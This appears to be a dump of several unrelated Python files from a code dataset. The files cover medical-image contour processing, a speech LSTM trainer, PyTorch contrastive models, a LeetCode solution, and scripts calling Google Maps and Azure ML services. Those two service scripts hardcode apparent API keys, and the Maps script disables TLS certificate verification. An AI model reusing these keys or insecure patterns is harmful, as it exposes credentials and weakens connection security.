self.output_text({'results': True, 'message': ''})\n\n\nclass UpdateChainedCampaign(RESTResource):\n\n allowed_role = Roles.production_manager\n\n def __init__(self):\n RESTResource.__init__(self)\n self.db_name = 'chained_campaigns'\n self.before_request()\n\n def put(self):\n \"\"\"\n Update a chained campaign from the provide json content\n \"\"\"\n return self.output_text({'results': False, 'message': 'Not implemented'}, code=501)\n","sub_path":"rest_api/ChainedCampaignActions.py","file_name":"ChainedCampaignActions.py","file_ext":"py","file_size_in_byte":5306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"138245589","text":"#\n# @lc app=leetcode.cn id=93 lang=python3\n#\n# [93] 复原IP地址\n#\n\n# @lc code=start\nclass Solution:\n def restoreIpAddresses(self, s: str) -> List[str]:\n COUNT = 4\n segments, ans = [0]*COUNT, []\n \n def dfs(sid, start):\n # 终止条件\n if sid == COUNT and start == len(s):\n ipaddr = '.'.join([str(m) for m in segments])\n ans.append(ipaddr)\n return\n if sid == COUNT or start == len(s):\n return\n # 搜索过程\n if s[start] == '0': # 除数字0外,不能以0开头,注意这里适合字符'0'比较\n segments[sid] = s[start]\n dfs(sid+1, start+1)\n return\n num = 0\n for i in range(start, len(s)):\n num = num * 10 + int(s[i])\n if 255 >= num > 0:\n segments[sid] = num\n dfs(sid+1, i+1)\n else:\n break\n dfs(0, 0)\n return ans\n \n# @lc code=end\n\n","sub_path":"Week_02/93_复原IP地址.py","file_name":"93_复原IP地址.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"237736150","text":"import nibabel as nib\nfrom voxtox.rtstruct import getPolygons, getStructDict\nfrom voxtox.utility import pointXyzToIjk\nfrom skimage.measure import find_contours\nfrom skimage.filters import gaussian\nimport numpy as np\nfrom skimage import draw\nfrom shapely.geometry import Polygon\nfrom scipy.interpolate import RegularGridInterpolator\nfrom deform.registration import getNiiCoords\n\nclass Contours(object):\n # need to send the structure path to this class\n def __init__( self, structPath = \"\", roiList = [] ):\n super(Contours, self).__init__()\n self.path = structPath\n self.roiList = roiList\n self.structDict = self.getStructures(self.roiList)\n self.polyDict = self.getPolygonDict()\n \n def getStructures( self, roiList ):\n #roiList = getROIList( roi )\n rtStructDict = getStructDict( self.path, roiList )\n # this polygon dict only gets the polygon for the first \n # structure in the list\n contourDict = {}\n for key in rtStructDict.keys():\n name = rtStructDict[key][ \"name\" ]\n allPlanesDict = rtStructDict[key][ \"planes\" ]\n contourDict[name] = self._getContourData(allPlanesDict)\n return contourDict\n\n def getPolygonDict(self):\n polyDict = {}\n for roi in self.structDict:\n contourDict = self.structDict[roi]\n polyDict[roi] = {}\n for zslice in contourDict:\n polyDict[roi][zslice] = Polygon(contourDict[zslice])\n return polyDict\n\n def createLabelNii( self, origNii, filename = 'label_test.nii' ):\n labelNii = nib.load(origNii)\n labelNii.header.set_data_dtype('uint32')\n labelImg = self.createLabelImg(labelNii)\n label = nib.Nifti1Image(labelImg, labelNii.affine, labelNii.header)\n nib.save(label, filename)\n\n def createLabelImg( self, origNii ):\n \n origShape = origNii.header.get_data_shape()\n labelImg = np.zeros(origShape, dtype = 'uint32')\n if len(self.structDict.keys()) > 32:\n raise ValueError('Label image can only represent 32 structures')\n \n # loop over 
structures - have to start from 1\n for n, roi in enumerate(sorted(self.structDict.keys())):\n n += 1\n binImg = np.zeros(origShape, dtype = np.bool)\n\n # loop over contours and sort from lowest z to highest\n for zslice in sorted(self.structDict[roi]):\n\n # convert x,y,z to voxel coordinates\n affine = np.linalg.inv(origNii.affine)\n contour = self.structDict[roi][zslice]\n # go from (x,y,z) array to (x,y,z,1)\n contour = np.c_[contour, np.ones(contour.shape[0])] \n # if not np.matmul use\n # np.core.umath_tests.matrix_multiply\n # this is only available in a newwer version of numpy\n ijk1 = np.matmul(affine, contour[...,np.newaxis]).reshape(contour.shape)\n ijk = ijk1[:,0:3]\n k = ijk[:,2]\n # check that they're all the same k value\n if not all(ktest == k[0] for ktest in k):\n print('Contour is not defined on one plane')\n\n #here is where we need to do python poly2mask\n contourMask = poly2mask(ijk[:,0], ijk[:,1],(origShape[0],origShape[1]))\n binImg[:,:,int(round(k[0]))] = contourMask\n\n #func = lambda x: set_bit(x, n, 1) #set the bits accoring to the ROI number]\n bitset = lambda x: x | (1 << n)\n labelImg[np.where(binImg)] = bitset(labelImg[np.where(binImg)])\n \n # to retrieve the individual structures again use:\n # a & (1< 1')\n for contourDict in contourList:\n data = np.array(contourDict[ \"contourData\" ], \\\n dtype = np.float)\n # need to reverse x and y for DICOM->Nifti\n data[:,0:2] = -data[:,0:2]\n planeDict[zslice] = data \n return planeDict\n\nclass _DeformContours(Contours):\n # don't use this code\n # this is just here if I ever want to use\n # snippets of this to deform landmarks/contours\n # according to an interpolated deformation \n # field\n def __init__(self):\n super(DeformContours, self).__init__()\n self.contourDict = self.getStructDict()\n\n def _deformContours( polyDictList ):\n dxy = 0.1\n wk0poly = polyDictList[0]\n testSlice = wk0poly[wk0poly.keys()[0]][0]\n pointList = list(testSlice.exterior.coords)\n xLast, yLast, zLast = pointList[ 0 ]\n xTuple = [ xLast ]\n yTuple = [ yLast ]\n zTuple = [ zLast ]\n for i in range( 1, len( pointList ) ):\n x, y, z = pointList[ i ]\n if ( abs( x - xLast ) > dxy ) or ( abs( y - yLast ) > dxy ):\n xTuple.append( pointList[ i ][ 0 ] )\n yTuple.append( pointList[ i ][ 1 ] )\n zTuple.append( pointList[ i ][ 2 ] )\n xLast, yLast, zLast = pointList[ i ]\n\n xArray = -np.array( xTuple )\n yArray = -np.array( yTuple )\n zArray = np.array( zTuple )\n xi = np.array([xArray, yArray, zArray]).T\n \n points, dvf = loadDefField()\n xfunction = RegularGridInterpolator(points, dvf[::-1,:,:,0])\n yfunction = RegularGridInterpolator(points, dvf[::-1,:,:,1])\n zfunction = RegularGridInterpolator(points, dvf[::-1,:,:,2])\n xNew = xfunction(xi)\n yNew = yfunction(xi)\n zNew = zfunction(xi)\n newPointList = zip(-xNew, -yNew, zNew)\n polygon2 = shapely.geometry.Polygon( newPointList )\n\n def _deformContours2(self ):\n from vtk import vtkPoints, vtkPolyData, vtkPolyDataWriter\n # dictionary returned by getStructDict()\n # load the first structure for now\n struct = self.ontourDict[self.contourDict.keys()[0]]\n pointList = []\n for key in sorted(struct.keys()):\n pointList.append(struct[key])\n pointArray = np.vstack(pointList)\n xArray = pointArray[:,0]\n yArray = pointArray[:,1]\n zArray = pointArray[:,2]\n xi = np.array([xArray, yArray, zArray]).T\n points, dvf = loadDefField()\n xfunction = RegularGridInterpolator(points, dvf[::-1,:,:,0])\n yfunction = RegularGridInterpolator(points, dvf[::-1,:,:,1])\n zfunction = 
RegularGridInterpolator(points, dvf[::-1,:,:,2])\n        xNew = xfunction(xi)\n        yNew = yfunction(xi)\n        zNew = zfunction(xi)\n        # list() is needed in Python 3, where zip returns a lazy iterator\n        newPointList = np.array(list(zip(xNew, yNew, zNew)))\n        from vtk.util import numpy_support as VN\n        pd = vtkPolyData()\n        pts = vtkPoints()\n        pts.SetData(VN.numpy_to_vtk(newPointList, deep=True))\n        pd.SetPoints(pts)\n        pdw = vtkPolyDataWriter()\n        pdw.SetInputData(pd)\n        pdw.SetFileName(\"parotid_deformed.vtk\")\n        pdw.Write()\n\n\nclass ContoursFromLabelNii(object):\n    def __init__(self, labelNii, roiList):\n        super(ContoursFromLabelNii, self).__init__()\n        self.labelNii = nib.load(labelNii)\n        self.roiList = roiList\n        self.polyDict = {}\n\n    def getContours(self, filterVal):\n        print(\"get contours\")\n        labelImg = self.labelNii.get_data()\n        polyDict = {}\n        for n, roi in enumerate(self.roiList):\n            # eventually use for n in self.nList:\n            ##### BITGET ######\n            # should return a binary image with 1's in\n            # the voxels where the ROI is\n            n += 1\n            print(n)\n            print(\"n : {} \\t roi: {}\".format(n, roi))\n            roiImg = (labelImg & (1 << n)) >> n\n\n            # remove z slices where the structure of interest does not exist\n            roiCrop = roiImg[:,:,~(roiImg==0).all(axis=(0,1))]\n            zcrop = ~(roiImg==0).all(axis=(0,1))\n            #imgCrop = origImg[:,:,~(roiImg==0).all(axis=(0,1))]\n            contourDict = {}\n            for k, kslice in enumerate(np.rollaxis(roiImg,2)):\n                if zcrop[k]:\n                    filteredRoi = gaussian(kslice, sigma=1, preserve_range=True)\n                    contours = find_contours(filteredRoi, filterVal, \\\n                        fully_connected='high', positive_orientation='high')\n                    polyDict[roi] = self.getContourDict(contours, k, self.labelNii.affine, \\\n                        contourDict)\n        return polyDict\n\n    def getVdim(self):\n        return self.labelNii.header.get_zooms()\n    \n    def getBinaryImages(self):\n        labelImg = self.labelNii.get_data()\n        imageDict = {}\n        for n, roi in enumerate(self.roiList):\n            n += 1\n            roiImg = (labelImg & (1 << n)) >> n\n            imageDict[roi] = roiImg\n\n        return imageDict\n    \n    def getContourDict(self, contours, k, affine, contourDict, \\\n            getPolygons = True):\n        for contour in contours:\n            contourXyz = self.getContourXyz(contour, k, affine)\n            z = contourXyz[0,2]\n            if np.abs(z - round(z)) < 1e-3:\n                z = round(z)\n                contourXyz[:,2] = z\n            polygon = Polygon(contourXyz)\n            if z not in contourDict:\n                if getPolygons:\n                    contourDict[z] = [polygon]\n                else:\n                    contourDict[z] = [contourXyz]\n            else:\n                if getPolygons:\n                    contourDict[z].append(polygon)\n                else:\n                    contourDict[z].append(contourXyz)\n        return contourDict\n\n    def getContourXyz(self, ctr, k, affine):\n        ctr = np.c_[ctr, np.ones(ctr.shape[0])*k, np.ones(ctr.shape[0])]\n        ctr_xyz1 = np.matmul(affine, ctr[...,np.newaxis]).\\\n            reshape(ctr.shape)\n        return ctr_xyz1[:,0:3]\n\n
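def _demo_label_bitmask():\n    \"\"\"Illustrative sketch, not part of the original pipeline: the label image packs up\n    to 32 ROIs as bit flags (bit n marks ROI n), so membership round-trips as below.\"\"\"\n    labelImg = np.zeros((4, 4), dtype='uint32')\n    n = 3  # hypothetical ROI index\n    labelImg[1, 2] |= (1 << n)  # set: voxel (1, 2) belongs to ROI n\n    roiImg = (labelImg & (1 << n)) >> n  # get: binary mask for ROI n\n    assert roiImg[1, 2] == 1\n\n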
class ConformityChecker(object):\n\n    def __init__(self, polygon1=None, polygon2=None, stepSize=1.):\n        self.polygon1 = polygon1\n        self.polygon2 = polygon2\n        self.stepSize = stepSize\n        self.union = polygon1.union(polygon2)\n        self.intersection = polygon1.intersection(polygon2)\n        if self.union.area:\n            self.conformityIndex = self.intersection.area / self.union.area\n        else:\n            self.conformityIndex = 0.\n        self.dice = 2 * self.intersection.area / (polygon1.area + polygon2.area)\n        self.hausdorff = polygon1.hausdorff_distance(polygon2)\n        #self.analyseDistancesToConformity()\n\n        #self.centroid1 = np.array(polygon1.centroid.coords).flatten()\n        #self.centroid2 = np.array(polygon2.centroid.coords).flatten()\n\n        #self.analyseDistanceBetweenCentres()\n        #self.analyseLeftRightAntPostDifferences()\n\n    def analyseDistancesToConformity(self):\n        # local import: Point is not imported at the top of this module\n        from shapely.geometry import Point\n        x1, y1, x2, y2 = [float(int(xy)) for xy in self.union.bounds]\n\n        distanceList1 = []\n        distanceList2 = []\n        nPixel = 0\n        # walk the union's bounding box on a stepSize grid\n        for x in np.arange(x1, x2 + 1., self.stepSize):\n            for y in np.arange(y1, y2 + 1., self.stepSize):\n                testPoint = Point(x, y)\n                if testPoint.within(self.union):\n                    nPixel = nPixel + 1\n                    # signed convention: positive = outside the reference polygon1,\n                    # negative = outside the evaluated polygon2\n                    if not testPoint.within(self.polygon1):\n                        #polygon 1 is the reference polygon - polygon 2 is the evaluation\n                        distanceList1.append(testPoint.distance(self.polygon1))\n                    elif not testPoint.within(self.polygon2):\n                        distanceList2.append(-testPoint.distance(self.polygon2))\n\n        self.distanceList = distanceList1 + distanceList2\n        self.meanDistanceToConformity = 0.\n        self.meanOutsidePolygon1 = 0.\n        self.meanOutsidePolygon2 = 0.\n        self.distanceWeight = 0.\n\n        if distanceList1:\n            self.meanOutsidePolygon1 = sum(distanceList1) / len(distanceList1)\n\n        if distanceList2:\n            self.meanOutsidePolygon2 = -sum(distanceList2) / len(distanceList2)\n\n        if self.distanceList:\n            self.meanDistanceToConformity = \\\n                (sum(distanceList1) - sum(distanceList2)) \\\n                / (len(distanceList1) + len(distanceList2))\n\n        if nPixel:\n
            self.distanceWeight = 1. / float(nPixel)\n\n        return None\n\n    def analyseDistanceBetweenCentres(self):\n        #define the reference polygon centroid as the origin\n        #and produce a vector with magnitude and direction\n        self.centroidShiftVector = 0.\n        self.distanceBetweenCentres = 0.\n        self.unitCentroidShiftVector = 0.\n\n        # the module imports numpy as np, so that alias is used here\n        self.centroidShiftVector = self.centroid2 - self.centroid1\n        self.distanceBetweenCentres = np.linalg.norm(self.centroidShiftVector)\n        self.unitCentroidShiftVector = self.centroidShiftVector / self.distanceBetweenCentres\n\n        return None\n\n    def analyseLeftRightAntPostDifferences(self):\n        self.LRchange = 0.\n        self.APchange = 0.\n        x1min, y1min, x1max, y1max = [float(xy) for xy in self.polygon1.bounds]\n        x2min, y2min, x2max, y2max = [float(xy) for xy in self.polygon2.bounds]\n\n        x1range = abs(x1max - x1min)\n        x2range = abs(x2max - x2min)\n        self.LRchange = x2range - x1range\n\n        y1range = abs(y1max - y1min)\n        y2range = abs(y2max - y2min)\n        self.APchange = y2range - y1range\n        return None\n\ndef poly2mask(vertex_row_coords, vertex_col_coords, shape):\n    fill_row_coords, fill_col_coords = draw.polygon(vertex_row_coords, vertex_col_coords, shape)\n    mask = np.zeros(shape, dtype=bool)\n    mask[fill_row_coords, fill_col_coords] = True\n    return mask\n\ndef surfd(input1, input2, sampling=1, connectivity=1):\n    from scipy.ndimage import morphology\n    # surface_distance = surfd()\n    # msd = surface_distance.mean()\n    # rms = np.sqrt((surface_distance**2).mean())\n    # hd = surface_distance.max()\n    # from https://mlnotebook.github.io/post/surface-distance-function/\n    input_1 = np.atleast_1d(input1.astype(bool))\n    input_2 = np.atleast_1d(input2.astype(bool))\n\n    conn = morphology.generate_binary_structure(input_1.ndim, connectivity)\n\n    S = np.bitwise_xor(input_1, morphology.binary_erosion(input_1, conn))\n    Sprime = np.bitwise_xor(input_2, morphology.binary_erosion(input_2, conn))\n\n    dta = morphology.distance_transform_edt(~S, sampling)\n    dtb = morphology.distance_transform_edt(~Sprime, sampling)\n    \n    sds = np.concatenate([np.ravel(dta[Sprime != 0]), np.ravel(dtb[S != 0])])\n    \n    return sds\n\ndef getDice(input1, input2):\n    input_1 = np.atleast_1d(input1.astype(int))\n    input_2 = np.atleast_1d(input2.astype(int))\n    overlap = input_1 + input_2\n    # voxels where the sum is 2 belong to both masks, i.e. the intersection\n    overlap[np.where(overlap == 1)] = 0\n    overlap[np.where(overlap == 2)] = 1\n    dice = 2 * np.sum(overlap).astype(float) / (np.sum(input_1) + np.sum(input_2))\n    return dice","sub_path":"registration/optimisation/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":14131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"625206853","text":"\nimport json, urllib.request\nimport ssl\n\nzip1 = 42119\nstreet_address = \"am+freudenberg+75\"\n\nkey_geo = \"AIzaSyDC1RZ-cUJdGrJmLmaDfi7KWPBmiaZTyF4\"\n\nif street_address != \"\":\n    geo_address = street_address + '-' + str(zip1)\n\n    print(geo_address)\n\n\n\n    context = ssl._create_unverified_context()\n    geo_api = \"https://maps.googleapis.com/maps/api/geocode/json?address=\" + geo_address + \"&key=\" + key_geo\n    with urllib.request.urlopen(geo_api, context=context) as url:\n        geo_data = json.loads(url.read().decode())\n        geo_lat = geo_data[\"results\"][0][\"geometry\"][\"location\"][\"lat\"]\n        geo_lng = geo_data[\"results\"][0][\"geometry\"][\"location\"][\"lng\"]\n    print(geo_lat)\n    print(geo_lng)\n\n    nearby_api = \"https://maps.googleapis.com/maps/api/place/nearbysearch/json?location=\" + str(geo_lat) +\"%2C\" + 
str(geo_lng) +\"&rankby=distance&type=train_station&key=\" + key_geo\n print(nearby_api)\n with urllib.request.urlopen(nearby_api, context=context) as url:\n nearby_data_raw = json.loads(url.read().decode())\n print(nearby_data_raw)\n\n nearby_station_name = nearby_data_raw[\"results\"][0][\"name\"]\n nearby_station_lat = nearby_data_raw[\"results\"][0][\"geometry\"][\"location\"][\"lat\"]\n nearby_station_lng = nearby_data_raw[\"results\"][0][\"geometry\"][\"location\"][\"lng\"]\n\n\n print(nearby_station_name)\n\n distance_api = \"https://maps.googleapis.com/maps/api/directions/json?origin=\" + str(geo_lat) + \"%2c\" + str(geo_lng) + \"&destination=\" + str(nearby_station_lat) + \"%2c\" + str(nearby_station_lng) + \"&mode=walk&key=\" + key_geo\n with urllib.request.urlopen(distance_api, context=context) as url:\n distance_raw = json.loads(url.read().decode())\n nearby_station_distance = distance_raw[\"routes\"][0][\"legs\"][0][\"distance\"][\"text\"]\n nearby_station_duration = distance_raw[\"routes\"][0][\"legs\"][0][\"duration\"][\"text\"]\n \n distance_api = \"https://maps.googleapis.com/maps/api/directions/json?origin=\" + str(geo_lat) + \"%2c\" + str(geo_lng) + \"&destination=\" + \"50.9427839\" + \"%2c\" + \"6.9590705\" + \"&mode=walk&key=\" + key_geo\n with urllib.request.urlopen(distance_api, context=context) as url:\n distance_raw2 = json.loads(url.read().decode())\n cologne_distance = distance_raw2[\"routes\"][0][\"legs\"][0][\"distance\"][\"text\"]\n cologne_duration = distance_raw2[\"routes\"][0][\"legs\"][0][\"duration\"][\"text\"] \n\n distance_api = \"https://maps.googleapis.com/maps/api/directions/json?origin=\" + str(geo_lat) + \"%2c\" + str(geo_lng) + \"&destination=\" + \"51.22019577026367\" + \"%2c\" + \"6.792957305908203\" + \"&mode=walk&key=\" + key_geo\n with urllib.request.urlopen(distance_api, context=context) as url:\n distance_raw2 = json.loads(url.read().decode()) \n dusseldorf_distance = distance_raw2[\"routes\"][0][\"legs\"][0][\"distance\"][\"text\"]\n dusseldorf_duration = distance_raw2[\"routes\"][0][\"legs\"][0][\"duration\"][\"text\"]","sub_path":"bus-distancetest.py","file_name":"bus-distancetest.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"316758223","text":"import sys\nimport csv\nimport numpy\nimport pandas\nfrom collections import OrderedDict\n\nimport keras\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Dense, Dropout, Activation\nfrom keras.layers import TimeDistributed\nfrom keras.layers import LSTM\nfrom keras.preprocessing import sequence\nfrom keras.optimizers import SGD\n# fix random seed for reproducibility\n# numpy.random.seed(7)\n\nfeatures = 108\n# readin\n# train.ark (1124823, 70+39) test.ark (180406, 70)\nX_temp = pandas.read_csv(sys.argv[1]+'fbank/train.ark', sep=' ', header=None).values\nX_temp2 = pandas.read_csv(sys.argv[1]+'mfcc/train.ark', sep=' ', header=None).values\nX_temp = numpy.append( X_temp, X_temp2[:, 1:], axis=1)\n# train.lab (1124823, 2)\ny_temp = pandas.read_csv(sys.argv[1]+'label/train.lab', sep=',', header=None).values\nmap48phone_char = pandas.read_csv(sys.argv[1]+'48phone_char.map', sep='\\t', header=None).values\nd48tonum = OrderedDict( zip(map48phone_char[:,0], map48phone_char[:,1]) )\n\n# aligning\nd1 = OrderedDict( zip(X_temp[:,0], numpy.zeros(X_temp.shape[0])) )\nd2 = OrderedDict( zip(y_temp[:,0], y_temp[:,1]) )\nd1.update(d2)\ny_temp = numpy.array( list( d1.values() ) )\n\n# 
mapping\nfor i in range(y_temp.shape[0]):\n y_temp[i] = d48tonum.get(str(y_temp[i]))\ny_temp = y_temp.astype(numpy.int16)\n\n# reshape\nwav_count = 1\nfor i in range(X_temp.shape[0]):\n X_temp[i, 0] = int(str(X_temp[i, 0]).split('_')[2])\nfor i in range(X_temp.shape[0]-1):\n if X_temp[i, 0] > X_temp[i+1, 0] :\n wav_count = wav_count + 1\nmax_time = int(numpy.amax(X_temp[:,0]))\n\n\nX = numpy.zeros((wav_count, max_time, features), numpy.float)\ny = numpy.zeros((wav_count, max_time, 1 ), numpy.int16)\n\ncount = 0\nfor i in range(X_temp.shape[0]-1):\n if X_temp[i, 0] > X_temp[i+1, 0] or i == (X_temp.shape[0]-2) :\n flame = X_temp[i, 0]\n X_resh = numpy.reshape(X_temp[( i+1- flame) : (i+1), 1: ], (1, flame, features))\n y_resh = numpy.reshape(y_temp[( i+1- flame) : (i+1) ] , (1, flame, 1))\n zerofeatures = numpy.zeros((1, max_time-flame, features), numpy.float)\n zero1 = numpy.ones((1, max_time-flame, 1 ), numpy.int16) * 37\n # numpy.repeat( numpy.reshape( y_resh[0, flame-1,:], (1, 1, 1)), max_time-flame, axis=1)\n X[count] = numpy.append( X_resh , zerofeatures, axis=1)\n y[count] = numpy.append( y_resh , zero1 , axis=1)\n count = count + 1\n\n\nX_train = numpy.copy(X)\ny_train = keras.utils.to_categorical( y , 48 )\ny_train = numpy.reshape(y_train, (X_train.shape[0], X_train.shape[1], 48))\n\n# for debugging\nprint('X(samples, timesteps, input_dim):', X_train.shape)\nprint('--------------------------------')\nprint('y(samples, timesteps, output_dim):', y_train.shape)\nprint('--------------------------------')\n# Start training\nmodel = Sequential()\n# model.add(Embedding(features, output_dim=256))\nmodel.add(LSTM(1024,\n # input_length=TIME_STEPS, input_dim=INPUT_SIZE\n input_shape=(X_train.shape[1], X_train.shape[2]), \n batch_size=16,\n return_sequences=True,\n stateful=True))\nmodel.add(Dropout(0.2))\nmodel.add(LSTM(1024, return_sequences=True))\nmodel.add(Dropout(0.2))\nmodel.add(TimeDistributed(Dense(48, activation='softmax')))\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n# model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\nprint(model.summary())\nmodel.fit(X_train, y_train, epochs=2, batch_size=16)\nmodel.save(sys.argv[2])","sub_path":"hw1/model_rnn.py","file_name":"model_rnn.py","file_ext":"py","file_size_in_byte":3524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"304355991","text":"from .ContrastiveLoss import *\r\nimport torch\r\nimport torch.nn as nn\r\n\r\nclass TwoStreamPretrain(nn.Module):\r\n '''\r\n Pretraining on COCO dataset with cross-modal contrastive learning\r\n '''\r\n def __init__(self, image_model, language_model, embedding_dim=768, sigma=0.1):\r\n super(TwoStreamPretrain, self).__init__()\r\n self.image_model = image_model\r\n self.language_model = language_model\r\n self.image_projection_head = nn.Sequential(\r\n nn.Conv2d(embedding_dim, embedding_dim, kernel_size=1, stride=1, padding=0),\r\n )\r\n self.language_projection_head = nn.Sequential(\r\n nn.Linear(embedding_dim,embedding_dim),\r\n )\r\n self.sigma = sigma\r\n\r\n def forward(self, image_input, language_input, token_type, input_mask, nwords): # add two input terms: relation mask and relation class\r\n image_output = self.image_model(image_input)\r\n image_metric = self.image_projection_head(image_output)\r\n language_output = self.language_model(language_input, token_type, input_mask) # batch x n_object x emb_size\r\n language_metric = 
self.language_projection_head(language_output)\r\n        # loss function\r\n        loss_I2L, loss_L2I = cross_modal_contrastive_loss(image_metric, language_metric, nwords, sigma=self.sigma)\r\n\r\n        return loss_I2L, loss_L2I\r\n\r\nclass RelationalGrounding(nn.Module):\r\n    '''\r\n    Finetuning on Visual Genome dataset for relation prediction\r\n    '''\r\n    def __init__(self, image_model, language_model, cross_attention_model, embedding_dim=768, relation_size=115, temperature=1.0):\r\n        super(RelationalGrounding, self).__init__()\r\n        self.image_model = image_model\r\n        self.language_model = language_model\r\n        self.cross_attention_model = cross_attention_model\r\n        self.relation_size = relation_size\r\n        self.temperature = temperature\r\n        self.object_classifier = nn.Sequential(\r\n            nn.Linear(768, 256),\r\n            nn.ReLU(True),\r\n            nn.Dropout(0.1),\r\n            nn.Linear(256, 56),\r\n        )\r\n\r\n    def forward(self, image_input, object_input_all, segments_tensors_all, input_token_mask_all, input_mask, n_object, object_target, relation_target): # add two input terms: relation mask and relation class\r\n        language_output = self.language_model(object_input_all, segments_tensors_all, input_token_mask_all, input_mask) # batch x n_object x emb_size\r\n        image_output = self.image_model(image_input)\r\n        (query_language, key_visual, object_representation, relation_prediction, normalized_relational_matrix) = self.cross_attention_model(image_output, language_output, attention_mask=input_mask)\r\n        object_prediction = self.object_classifier(object_representation)\r\n        object_prediction = object_prediction.permute(0, 2, 1)\r\n        # loss functions:\r\n        loss_cls_object = torch.nn.CrossEntropyLoss(reduction='none')(object_prediction, object_target) # auxiliary loss for classifying visually grounded objects\r\n        loss_pair, loss_relation = relation_contrastive_loss(relation_prediction, relation_target, temperature=self.temperature) # contrastive loss between relation and object pairs\r\n\r\n        return loss_cls_object, loss_pair, loss_relation, relation_target, relation_prediction, object_target, object_prediction\r\n\r\nclass TransferCrossModalRetrieval(nn.Module):\r\n    def __init__(self, image_model, language_model, cross_attention_model, embedding_dim=768, metric_dim=768, sigma=0.1):\r\n        super(TransferCrossModalRetrieval, self).__init__()\r\n        self.image_model = image_model\r\n        self.language_model = language_model\r\n        self.cross_attention_model = cross_attention_model\r\n        self.image_projection_head = nn.Sequential(\r\n            nn.Conv2d(embedding_dim, embedding_dim, kernel_size=1, stride=1, padding=0),\r\n            nn.ReLU(True),\r\n            nn.Dropout(),\r\n            nn.Conv2d(embedding_dim, metric_dim, kernel_size=1, stride=1, padding=0),\r\n        )\r\n        self.language_projection_head = nn.Sequential(\r\n            nn.Linear(embedding_dim,embedding_dim),\r\n            nn.ReLU(True),\r\n            nn.Dropout(),\r\n            nn.Linear(embedding_dim, metric_dim),\r\n        )\r\n        self.sigma = sigma\r\n\r\n    def forward(self, image_input, language_input, token_type, input_mask, nwords): # add two input terms: relation mask and relation class\r\n        language_output = self.language_model.language_model(language_input, token_type, input_mask)[0] #.last_hidden_state # batch x n_word x emb_size\r\n        image_output = self.image_model(image_input)\r\n        (query_language, key_visual, _, _, _, _, _) = self.cross_attention_model(image_output, language_output, attention_mask=input_mask)\r\n        image_metric = self.image_projection_head(key_visual)\r\n        language_metric = self.language_projection_head(query_language)\r\n        # loss functions:\r\n
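        # NOTE: both modalities are mean-pooled to a single vector per sample before the\r\n        # loss; finetune_pooled_contrastive_loss comes from ContrastiveLoss (imported with\r\n        # *) and is assumed to score image/text pairs in both retrieval directions.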
torch.mean(image_metric,(2,3)) # pool image embedding to single vector\r\n        language_pool_metric = torch.mean(language_metric,1) # pool language embedding to single vector\r\n        loss_I2L, loss_L2I = finetune_pooled_contrastive_loss(image_pool_metric, language_pool_metric, sigma=self.sigma) #\r\n\r\n        return image_metric, language_metric, loss_I2L, loss_L2I\r\n","sub_path":"models/FullModels.py","file_name":"FullModels.py","file_ext":"py","file_size_in_byte":5333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"222409284","text":"#import libraries\nfrom flask import Flask,render_template,url_for,request\nimport pickle\nfrom sklearn.externals import joblib\nimport urllib.request\nimport json\nimport datetime\n\n#function to classify user's click based on their demographic details\ndef click_classifier(daily_time_spent, age, income, daily_internet_usage, male, month, day_month, weekday):\n    classify_model = open('./classify_cust_click1.pkl','rb')\n    clk = joblib.load(classify_model)\n    click_prediction = ''\n    click_prediction = clk.predict([[daily_time_spent, age, income, daily_internet_usage, male, month, day_month, weekday]])\n    return click_prediction[0]\n\ndef azure_classifier(daily_time_spent, age, income, daily_internet_usage, male, date_clicked_ts):\n    data = {\n        \"Inputs\":{\n            \"input1\":[\n                {\n                    'Daily Time Spent on Site': daily_time_spent, \n                    'Age': age, \n                    'Area Income': income, \n                    'Daily Internet Usage': daily_internet_usage, \n                    'Ad Topic Line': \"Cloned 5thgeneration orchestration\", \n                    'City': \"Wrightburgh\", \n                    'Male': male, \n                    'Country': \"Tunisia\", \n                    'Timestamp': date_clicked_ts, \n                    'Clicked on Ad': \"0\", \n                }\n            ],\n        },\n        \"GlobalParameters\":{\n\n        }\n    }\n\n    def myconverter(o):\n        if isinstance(o, datetime.datetime):\n            return o.__str__()\n\n    body = str.encode(json.dumps(data, default = myconverter))\n    url = 'https://ussouthcentral.services.azureml.net/workspaces/ef38c30a218d4b6596c184f8980f563f/services/b306c2c378f64c0b83be8c8de8bf064b/execute?api-version=2.0&format=swagger'\n    api_key = 'kF0DpKj2wPUB6ytds1+59ejPqrq8qWQyajN/0MhqrYUx5sSm+toveiz6SzfEI91Ax/K4QxLm++NdEbCjQ+Ga9w==' # Replace this with the API key for the web service\n    headers = {'Content-Type':'application/json', 'Authorization':('Bearer '+ api_key)}\n    \n    req = urllib.request.Request(url, body, headers)\n    response = urllib.request.urlopen(req)\n    result = response.read().decode('utf-8')\n    print (result)\n    d = json.loads(result)\n    print (d['Results']['output1'][0]['Scored Labels'])\n    return d['Results']['output1'][0]['Scored Labels']","sub_path":"user click prediction ad/click prediction demographic flask/clickclassifier.py","file_name":"clickclassifier.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
